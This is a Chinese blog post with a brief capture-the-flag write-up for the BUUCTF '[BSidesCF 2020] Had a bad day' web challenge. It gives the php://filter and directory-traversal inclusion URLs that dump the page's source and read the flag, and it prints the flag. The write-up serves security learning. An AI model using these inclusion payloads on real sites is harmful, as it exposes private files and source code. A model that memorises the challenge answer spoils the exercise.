BUUCTF_[BSidesCF 2020]Had a bad day

最新推荐文章于 2024-05-20 17:20:00 发布
最新推荐文章于 2024-05-20 17:20:00 发布
阅读量399 收藏 2
点赞数 8
分类专栏: Web安全 Buuctf 信息安全 文章标签: web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/138225619
版权
信息安全 同时被 3 个专栏收录
78 篇文章 10 订阅
订阅专栏
Web安全
50 篇文章 4 订阅
订阅专栏
Buuctf
17 篇文章 1 订阅
订阅专栏

[BSidesCF 2020]Had a bad day

1.一看题目直接尝试文件包含
在这里插入图片描述

2.直接报错,确实是存在文件包含漏洞
http://307b4461-36d6-443f-879a-68803a57f721.node5.buuoj.cn:81/index.php?category=php://filter/convert.base64-encode/resource=index

在这里插入图片描述

在这里插入图片描述

strpos() 函数查找字符串在另一字符串中第一次出现的位置(区分大小写)。
注释:strpos() 函数是区分大小写的。
注释:该函数是二进制安全的。

3.说明输入的参数必须含有woofersmeowersindex
http://307b4461-36d6-443f-879a-68803a57f721.node5.buuoj.cn:81/index.php?category=php://filter/convert.base64-encode/resource=index…/…/flag

在这里插入图片描述

在这里插入图片描述
4.成功得到flag
flag{558a1dc9-78a9-41bc-9833-e3168ad731b2}
在这里插入图片描述

山川绿水
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
HAD-entertainment_hub:HAD2项目
05-19
Create React App入门该项目是通过引导的。可用脚本在项目目录中,可以运行:npm start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何棉绒错误...
BUUCTF [BSidesCF 2020] Had a bad day
Senimo
12-11 517
BUUCTF [BSidesCF 2020] Had a bad day 考点: php伪协议嵌套 启动环境: 其中包含两个按钮,选择猫和狗的图片: 此时的URL变为: http://xxx/index.php?category=meowers 其中包含有GET传参,尝试修改category传入的值,得到报错: 其中为include()函数报错,尝试获取index.php页面的源码:php://filter/read=convert.base64-encode/resource=index.php:
BUUCTF Web [BSidesCF 2020]Had a bad day1
网安小趴菜
09-20 841
BUUCTF Web [BSidesCF 2020]Had a bad day1
BUUCTF】[BSidesCF 2020]Had a bad day
aoao331198的博客
04-24 738
注意到url中的参数category,以为是注入点,实际上输入其他的只会一个错误说明 用php伪协议读取文件 /index.php?category=php://filter/convert.base64-encode/resource=index 解密拿到代码 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || st.
BUUCTF:[BSidesCF 2020]Had a bad day
末初的CSDN博客
03-30 5246
BUUCTF:[BSidesCF 2020]Had a bad day 可能存在SQL注入或者文件包含,在我尝试读取index.php源码的时候出现了报错信息 的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败在后面测试的时候,发现除掉后缀即可读取到源码 base64解码读取源码 <?php $file = $_GET['category']; ...
buuctf-[BSidesCF 2020]Had a bad day(小宇特详解)
小宇的web博客
02-16 4280
buuctf-[BSidesCF 2020]Had a bad day(小宇特详解) 先看一下题目 这里上面有注入点,这里怀疑是SQL注入 先尝试读取一下index.php 这里使用php伪协议 payload: php://filter:/convert.base64-encode/resource=index.php 存在文件包含漏洞,但是这里报错了,分析之后是无法打开流:操作失败 这里去除php后缀 payload php://filter/convert.base64-encode/reso
[BSidesCF 2020]Had a bad day
4pri1
05-24 557
[BSidesCF 2020]Had a bad day https://github.com/BSidesSF/ctf-2020-release/ 点击两个按钮,url栏的category= 会发生变化 这里是伪协议的知识点: ——摘自:https://blog.csdn.net/weixin_44508748/article/details/108162951. 本题用到的就是filter这个伪协议 所以构造url:http://97621188-63ea-4882-...
BUUCTF之[BSidesCF 2020]Had a bad day --- 文件包含漏洞
weixin_44632787的博客
06-22 971
BUUCTF之[BSidesCF 2020]Had a bad day 题目 点击下面的那两个按钮的时候,发现图片会变化。而且链接上的值也是跟着变化。(看上去像是文件包含的题目) 点击链接的时候只是category=后面的值改变,使用盲猜是文件包含漏洞。所以试试?category=flag.php 好吧,可能是攻击的方式不对。换换其它的: ?category=flag.php # 失败 ?category=flag # 失败 ?category=php://filter/read=co
buuctf-web-[BSidesCF 2020]Had a bad day
weixin_46079186的博客
07-11 247
题目地址 打开题目 随机点击一个按钮 看这样子是文件包含 尝试了很多,最后发现index 不能加.php 这样才可以读出源码 php://filter/read=convert.base64-encode/resource=index 解密一下,拿到关键代码 审计代码,包含的字符必须有 woofers或者meowers或index 其中一个 这边还使用了拼接 .php ,所以第一步那里只能写index <?php $file = $_GET['category']; if(isse
buuctf-[BSidesCF 2020]Had a bad day 文件包含
2202_75317918的博客
10-04 338
像文件包含,使用php伪协议读取一下,但是发现报错,而且有两个.php,可能是自己会加上php后缀。其中一个才能包含传入以传入名为文件名的文件,要想办法包含flag.php。但是文件里面必须要有index,woofers,看到一串base64,解码。之中的一个改payload。就两个按钮,随便按按。
WHM.rar_hadamard_walsh_walsh hadamard_walsh transform_walsh-hada
09-14
快速Walsh--Hadamard(WHM)变换与反变换程序示例
六年级英语上册 Unit 7 I had a bad day.第一课时教案 广东版开心.doc
10-13
小学教案
六年级英语上册 Unit 7 I had a bad day.第三课时教案 广东版开心.doc
10-13
小学教案
OfficeOpenXmlReplaceFiled_Office_open_field_word_had9k4_源码
10-01
使用open XML操作替换word作用域,包含文本,表格,图片等替换
一表捋清网络安全等级保护测评要求
weixin_45840241的博客
05-15 570
对于中小企事业单位来说,网络安全建设是一个复杂且投入较高的过程,因此他们更倾向于寻找一种“省心省力”的等保建设方案,以及一种能够持续有效且具有较高性价比的网络安全建设投入方式。通过采用等保一体机方案,客户能够根据自身需求定制所需的安全能力,例如等保二级能力与行为管理能力的结合,等保三级能力与远程安全接入能力的结合等。等保安全套餐方案一直致力于构建“一站式省时省力过等保,安全有效且具有高性价比”的优势,以更好地满足中小企事业单位的网络安全建设需求。导致的安全设备闲置或无法满足等保要求等。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 594
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
Upstream最新发布2024年汽车网络安全报告-百度网盘下载
最新发布
qq_18209847的博客
05-20 197
Levy总结道:“在负责保护车队、电动汽车充电站和基础设施的网络安全利益相关者中,对汽车网络安全的重要性日益增加。特别是在GenAI日益普及的情况下,其降低了黑帽子行为者的进入门槛,使他们能够比以往更快、更有效地进行大规模攻击。这份报告的第六版着重介绍了汽车网络安全的拐点:从实验性的黑客攻击发展到规模庞大的攻击,并产生了怎样的影响。另外今年的报告还提供了关于网络攻击的财务影响的独到见解,它提供了一个可操作的框架,用于在现实场景中衡量网络攻击的货币影响。
【实事】——《2024网络安全报告》
weixin_65728773的博客
05-14 620
尽管如此,我们也必须做出改变,否则就会像2023年所看到的那样,领先的企业提早采用新技术,落后的企业努力跟上信任和安全基础能力的步伐,以及网络生态系统内分散的激励机制,这些都将在未来几年加速数字鸿沟。在低收入的企业中,有52%的领导者表示,缺乏资源和技能是他们在设计网络弹性时面临的最大挑战。56%的领导者表示,在未来两年内,生成式人工智能将成为网络攻击者的工具。在不断变化的网络安全环境中,地缘政治的不稳定性、技术的飞速发展以及企业网络能力差距的日益扩大,都强化了建立网络弹性和实现系统化全球协作的必要性。
had_trs_a10-10145 had车载充电机设计开发要求
06-28
had_trs_a10-10145 had车载充电机设计开发要求如下: 1. 输入电压:12V DC-28V DC; 2. 输出电压:5V DC; 3. 最大输出电流:2A; 4. 各种保护功能需齐全,包括过压保护、过流保护和短路保护等; 5. 外壳材料需能够...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值